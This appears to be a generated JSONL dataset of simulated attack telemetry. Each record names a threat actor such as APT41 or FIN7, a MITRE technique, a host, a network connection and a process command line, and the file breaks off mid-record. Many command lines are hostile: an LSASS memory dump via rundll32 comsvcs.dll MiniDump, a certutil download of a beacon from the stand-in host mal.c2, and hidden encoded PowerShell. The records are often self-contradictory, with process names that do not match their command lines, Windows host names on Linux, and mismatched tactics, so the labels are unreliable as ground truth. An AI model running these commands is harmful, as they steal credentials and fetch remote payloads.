{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery","Execution"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20260828T201735000Z_0019649","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.161.251.106","name":"IAM-ROLE-DQYMLM4AFH","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19649APT41T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.49.102.212","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2486 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-04-24T23:57:37.000Z","user":{"name":"i-c0n8yzzj65jo","sid":"S-1-5-21-128907421-393231862-1258"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Credential Access"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20260429T234028000Z_0019651","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.125.59.181","name":"AZURE-VM-DPS9M9SI29","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19651Scattered SpiderT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.65.62.111","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-01-15T10:24:23.000Z","user":{"name":"i-81d78rdqwzel","sid":"S-1-5-21-298282324-239381860-8738"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20260111T123747000Z_0019653","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.18.80.184","name":"DB-ORACLE-IBGE9PRHH6","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19653Scattered SpiderT1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.33.125.65","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3979 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-02-20T16:50:16.000Z","user":{"name":"i-4v9wmabi7ubz","sid":"S-1-5-21-832372400-548146252-6254"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Defense Evasion","Exfiltration"],"technique_id":"T1546.003"},"event_id":"evt_fin7_20260216T042546000Z_0019655","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.231.114.138","name":"WIN-FIN-SRV-7G2NT03HDK","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19655FIN7T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.11.110.199","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1933 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-07-06T16:25:27.000Z","user":{"name":"svc_sgshf86ukvqp","sid":"S-1-5-21-430364666-959122601-4512"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Discovery","Defense Evasion","Impact"],"technique_id":"T1531"},"event_id":"evt_lapsus_20260814T212959000Z_0019657","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.202.135.166","name":"AZURE-VM-HKBX69W5C7","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19657Lapsus$T1531"},"network":{"domain":"github.com","dst_ip":"1.38.89.49","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-09-23T03:03:24.000Z","user":{"name":"i-6xhwj5lrkhpf","sid":"S-1-5-21-335287257-763872327-5584"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Command and Control","Privilege Escalation","Execution"],"technique_id":"T1098.004"},"event_id":"evt_volttyphoon_20260407T005900000Z_0019659","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.41.170.226","name":"EC2-INST-CPOBWUG4X9","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19659Volt TyphoonT1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.10.252.142","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3064 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-07T06:09:20.000Z","user":{"name":"i-nn6623ud0m62","sid":"S-1-5-21-754742412-608243478-9388"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence","Collection"],"technique_id":"T1570"},"event_id":"evt_apt41_20260328T135133000Z_0019661","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.122.103.29","name":"AZURE-VM-M2IPHO49V2","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19661APT41T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.37.118.142","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-11-22T12:27:36.000Z","user":{"name":"arn:aws:iam::l7m3pmawb9yu","sid":"S-1-5-21-865491294-548421876-8733"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Command and Control","Impact","Privilege Escalation"],"technique_id":"T1546.003"},"event_id":"evt_mustangpanda_20250523T013956000Z_0019663","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.217.173.117","name":"DB-ORACLE-9X4652UG5W","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19663Mustang PandaT1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.39.138.219","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1275 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-10-28T00:27:57.000Z","user":{"name":"azuread\\1b7yfdp51wx0","sid":"S-1-5-21-447923946-988385084-4494"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Defense Evasion","Privilege Escalation","Reconnaissance"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20261115T081140000Z_0019665","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.254.250.106","name":"AZURE-VM-39D8HP3Q4I","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19665Mustang PandaT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.8.161.194","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-12-02T21:49:21.000Z","user":{"name":"svc_97s9sys2me55","sid":"S-1-5-21-201173169-906875425-2800"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Impact"],"technique_id":"T1059.001"},"event_id":"evt_apt41_20250421T165359000Z_0019667","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.149.217.70","name":"EC2-INST-7RYDX9LI52","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19667APT41T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.139.114.96","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2337 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-05-29T04:39:06.000Z","user":{"name":"arn:aws:iam::7n26fy2frht1","sid":"S-1-5-21-660528225-358756802-9863"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Lateral Movement"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20260910T223010000Z_0019669","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.198.207.159","name":"IAM-ROLE-XB9Y0ZT27E","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19669APT41T1566.001"},"network":{"domain":"github.com","dst_ip":"1.172.247.132","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-10-25T17:45:35.000Z","user":{"name":"azuread\\xkbebb3unu9j","sid":"S-1-5-21-966725801-741317140-6146"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Exfiltration","Lateral Movement","Collection"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20250115T141207000Z_0019671","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.147.179.78","name":"WIN-FIN-SRV-788FK6ZAZY","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19671Volt TyphoonT1003.001"},"network":{"domain":"github.com","dst_ip":"1.28.114.32","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2846 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-12-23T18:01:25.000Z","user":{"name":"CORP\\q1d8110mcwkq","sid":"S-1-5-21-463000879-158618153-4059"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Exfiltration","Privilege Escalation"],"technique_id":"T1546.003"},"event_id":"evt_fin7_20250831T013525000Z_0019673","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.224.105.93","name":"IAM-ROLE-NZ17HT07X7","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19673FIN7T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.96.163.49","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-04-06T14:19:02.000Z","user":{"name":"azuread\\86makw5ccui8","sid":"S-1-5-21-143570415-816106318-7407"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Reconnaissance"],"technique_id":"T1484.001"},"event_id":"evt_volttyphoon_20260710T125254000Z_0019675","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.77.65.102","name":"APP-WEB-OM97BMDETV","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19675Volt TyphoonT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.23.184.186","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1914 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-07-13T17:19:28.000Z","user":{"name":"azuread\\n48ubxc16t3j","sid":"S-1-5-21-433148893-849565571-8313"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Discovery","Exfiltration","Impact"],"technique_id":"T1531"},"event_id":"evt_fin7_20250907T202556000Z_0019677","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.170.20.225","name":"WIN-FIN-SRV-AFHTGXO9IJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19677FIN7T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.160.51.182","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2732 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-04-25T12:02:48.000Z","user":{"name":"azuread\\88mc2cldn43r","sid":"S-1-5-21-851090530-635227240-9821"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Impact","Collection"],"technique_id":"T1059.001"},"event_id":"evt_mustangpanda_20250412T090809000Z_0019679","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.255.37.128","name":"AZURE-VM-5YZQONWBWS","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19679Mustang PandaT1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.43.200.232","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-11-08T16:22:18.000Z","user":{"name":"CORP\\9smmmo3lk6gi","sid":"S-1-5-21-456278061-688964063-7648"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Exfiltration"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20250308T111724000Z_0019681","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.26.25.118","name":"DB-ORACLE-UT89EW0FCK","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19681Lapsus$T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.71.14.154","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-05-01T18:05:27.000Z","user":{"name":"i-z7d26oymegt7","sid":"S-1-5-21-249750731-608641083-6547"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Credential Access","Initial Access","Exfiltration"],"technique_id":"T1570"},"event_id":"evt_apt29_20260417T215850000Z_0019683","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.7.26.173","name":"WIN-FIN-SRV-7UJAOQVDAA","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19683APT29T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.164.226.128","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1716 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-12-30T15:53:38.000Z","user":{"name":"svc_oiv1m35d6zkl","sid":"S-1-5-21-349008877-426267227-1691"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Lateral Movement","Discovery"],"technique_id":"T1098.004"},"event_id":"evt_unc4841_20250319T075705000Z_0019685","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.247.239.159","name":"APP-WEB-GVG2X81JOX","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19685UNC4841T1098.004"},"network":{"domain":"github.com","dst_ip":"1.147.211.18","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3794 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-12-18T15:04:40.000Z","user":{"name":"arn:aws:iam::k3voutr17cs9","sid":"S-1-5-21-192584691-930991422-9091"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Privilege Escalation","Credential Access"],"technique_id":"T1531"},"event_id":"evt_apt29_20250814T051914000Z_0019687","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.72.130.228","name":"DB-ORACLE-E6O7W9YNOG","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19687APT29T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.131.210.115","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2068 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-05-11T15:55:24.000Z","user":{"name":"i-8cmtskrmwpop","sid":"S-1-5-21-684717189-684179283-1215"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Exfiltration","Execution"],"technique_id":"T1003.001"},"event_id":"evt_lapsus_20250102T190319000Z_0019689","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.108.136.162","name":"IAM-ROLE-5DRNLOW7MB","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19689Lapsus$T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.147.169.197","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-04-22T09:00:14.000Z","user":{"name":"azuread\\e11626fukmdl","sid":"S-1-5-21-442186585-352253133-6473"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Defense Evasion","Persistence","Command and Control"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20261230T120812000Z_0019691","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.66.99.113","name":"IAM-ROLE-EUG2A9LV64","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19691APT41T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.135.241.143","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2736 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-03-19T19:15:24.000Z","user":{"name":"azuread\\qaaymr5v7e6t","sid":"S-1-5-21-937398663-649760039-3911"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Execution","Exfiltration"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20250420T132557000Z_0019693","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.216.130.232","name":"DB-ORACLE-UQKCKZQ7OT","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19693Mustang PandaT1098.004"},"network":{"domain":"github.com","dst_ip":"1.82.122.49","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-02-28T07:38:44.000Z","user":{"name":"CORP\\hcu1th7m9rj0","sid":"S-1-5-21-946091149-592187421-1643"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Persistence"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20251018T014944000Z_0019695","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.85.201.13","name":"APP-WEB-5DBLFIAJII","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"19695Lapsus$T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.133.16.22","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging 